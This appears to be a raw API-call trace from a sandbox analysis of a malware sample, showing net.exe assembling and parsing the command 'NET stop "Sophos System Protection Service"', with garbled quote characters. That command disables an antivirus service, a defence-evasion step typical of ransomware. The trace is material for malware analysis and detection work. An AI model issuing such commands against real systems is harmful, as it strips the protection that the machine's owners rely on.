[0038.491] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0038.491] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.491] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0038.491] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.491] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0038.491] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.491] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0038.491] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0038.491] _wcsicmp (_String1="SESSIONS", _String2="System") returned -20 [0038.491] _wcsicmp (_String1="SESSIONS", _String2="Protection") returned 3 [0038.491] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0038.491] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0038.491] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.491] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0038.491] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0038.491] _wcsicmp (_String1="SESS", _String2="System") returned -20 [0038.491] _wcsicmp (_String1="SESS", _String2="Protection") returned 3 [0038.491] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0038.491] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.492] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0038.492] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.492] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0038.492] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.492] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0038.492] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0038.492] _wcsicmp (_String1="STATS", _String2="System") returned -5 [0038.492] _wcsicmp (_String1="STATS", _String2="Protection") returned 3 [0038.492] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0038.492] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.492] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0038.492] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.492] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0038.492] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.492] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0038.492] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0038.492] _wcsicmp (_String1="USERS", _String2="System") returned 2 [0038.492] _wcsicmp (_String1="USERS", _String2="Protection") returned 5 [0038.492] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0038.492] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.492] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0038.492] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.492] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0038.492] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.492] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0038.492] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0038.492] _wcsicmp (_String1="REDIRECTOR", _String2="System") returned -1 [0038.492] _wcsicmp (_String1="REDIRECTOR", _String2="Protection") returned 2 [0038.492] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0038.492] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0038.492] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.492] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0038.492] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0038.493] _wcsicmp (_String1="REDIR", _String2="System") returned -1 [0038.493] _wcsicmp (_String1="REDIR", _String2="Protection") returned 2 [0038.493] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0038.493] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0038.493] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.493] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0038.493] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0038.493] _wcsicmp (_String1="RDR", _String2="System") returned -1 [0038.493] _wcsicmp (_String1="RDR", _String2="Protection") returned 2 [0038.493] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0038.493] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0038.493] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.493] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0038.493] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0038.493] _wcsicmp (_String1="WORK", _String2="System") returned 4 [0038.493] _wcsicmp (_String1="WORK", _String2="Protection") returned 7 [0038.493] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0038.493] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0038.493] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.493] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0038.493] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0038.493] _wcsicmp (_String1="WKSTA", _String2="System") returned 4 [0038.493] _wcsicmp (_String1="WKSTA", _String2="Protection") returned 7 [0038.493] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0038.493] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0038.493] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.493] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0038.493] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0038.493] _wcsicmp (_String1="PRDR", _String2="System") returned -3 [0038.493] _wcsicmp (_String1="PRDR", _String2="Protection") returned -11 [0038.493] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0038.493] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0038.493] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.493] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0038.494] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0038.494] _wcsicmp (_String1="DEVRDR", _String2="System") returned -15 [0038.494] _wcsicmp (_String1="DEVRDR", _String2="Protection") returned -12 [0038.494] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0038.494] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.494] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0038.494] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.494] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0038.494] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.494] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0038.494] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0038.494] _wcsicmp (_String1="SVR", _String2="System") returned -3 [0038.494] _wcsicmp (_String1="SVR", _String2="Protection") returned 3 [0038.494] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0038.494] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0038.494] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.494] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0038.494] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0038.494] _wcsicmp (_String1="SRV", _String2="System") returned -7 [0038.494] _wcsicmp (_String1="SRV", _String2="Protection") returned 3 [0038.494] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0038.494] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.494] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x2af934, nSize=0x0, Arguments=0x2af930 | out: lpBuffer="㽐Tꔺ瓡") returned 0x1c [0038.494] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0038.494] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0038.494] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0038.494] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0038.494] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.494] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0038.494] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0038.494] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.494] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0038.494] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.495] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0038.495] wcscpy_s (in: _Destination=0x96a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0038.495] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74710000 [0038.495] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74710000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x96b338, nSize=0x800, Arguments=0x969dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0038.496] GetFileType (hFile=0x26c) returned 0x3 [0038.496] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x544220 [0038.496] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x544220, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0038.496] WriteFile (in: hFile=0x26c, lpBuffer=0x544220*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2af914, lpOverlapped=0x0 | out: lpBuffer=0x544220*, lpNumberOfBytesWritten=0x2af914*=0x20, lpOverlapped=0x0) returned 1 [0038.496] LocalFree (hMem=0x544220) returned 0x0 [0038.496] GetFileType (hFile=0x26c) returned 0x3 [0038.496] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x543db0 [0038.496] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x543db0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nT", lpUsedDefaultChar=0x0) returned 2 [0038.496] WriteFile (in: hFile=0x26c, lpBuffer=0x543db0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2af914, lpOverlapped=0x0 | out: lpBuffer=0x543db0*, lpNumberOfBytesWritten=0x2af914*=0x2, lpOverlapped=0x0) returned 1 [0038.496] LocalFree (hMem=0x543db0) returned 0x0 [0038.496] wcscpy_s (in: _Destination=0x2af9cc, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0038.496] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0038.496] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0038.496] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0038.496] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0038.497] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0038.497] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="System", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos System") returned 0x0 [0038.497] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos System", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos System ") returned 0x0 [0038.497] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos System ", _SizeInWords=0x200, _Source="Protection", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos System Protection") returned 0x0 [0038.497] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos System Protection", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos System Protection ") returned 0x0 [0038.497] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos System Protection ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥") returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T댸\x96露*Ѱ\x96ɬ") returned 0xad [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | NO}] [/M", _MaxCount=0x2f) returned 18 [0038.497] LocalFree (hMem=0x545888) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x2e [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DEL}\r\n\r\n", _MaxCount=0x2f) returned 16 [0038.497] LocalFree (hMem=0x543f98) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x7d [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time]\r\n ", _MaxCount=0x2f) returned 16 [0038.497] LocalFree (hMem=0x545888) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x26 [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x2f) returned 16 [0038.497] LocalFree (hMem=0x543f98) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x2f) returned 16 [0038.497] LocalFree (hMem=0x543f98) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x1b [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x2f) returned 13 [0038.497] LocalFree (hMem=0x543f98) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0xbe [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]] [/DOMA", _MaxCount=0x2f) returned 12 [0038.497] LocalFree (hMem=0x545888) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x33 [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET command /HELP", _MaxCount=0x2f) returned 11 [0038.497] LocalFree (hMem=0x543f98) returned 0x0 [0038.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.497] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x2f) returned 11 [0038.497] LocalFree (hMem=0x543f98) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0xc1 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"text\"]] [", _MaxCount=0x2f) returned 7 [0038.498] LocalFree (hMem=0x545888) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x16 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x2f) returned 3 [0038.498] LocalFree (hMem=0x543f98) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x33 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] [/LIST]", _MaxCount=0x2f) returned 15 [0038.498] LocalFree (hMem=0x543f98) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x234 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharename=drive", _MaxCount=0x2f) returned 12 [0038.498] LocalFree (hMem=0x545888) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x13 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x2f) returned 14 [0038.498] LocalFree (hMem=0x543f98) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x2f) returned 14 [0038.498] LocalFree (hMem=0x543f98) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x2f) returned 14 [0038.498] LocalFree (hMem=0x543f98) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.498] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x2f) returned 14 [0038.498] LocalFree (hMem=0x543f98) returned 0x0 [0038.498] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x16 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x11 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x12 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0xf [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x17 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x18 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x2a [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n\r\n", _MaxCount=0x2f) returned 14 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", 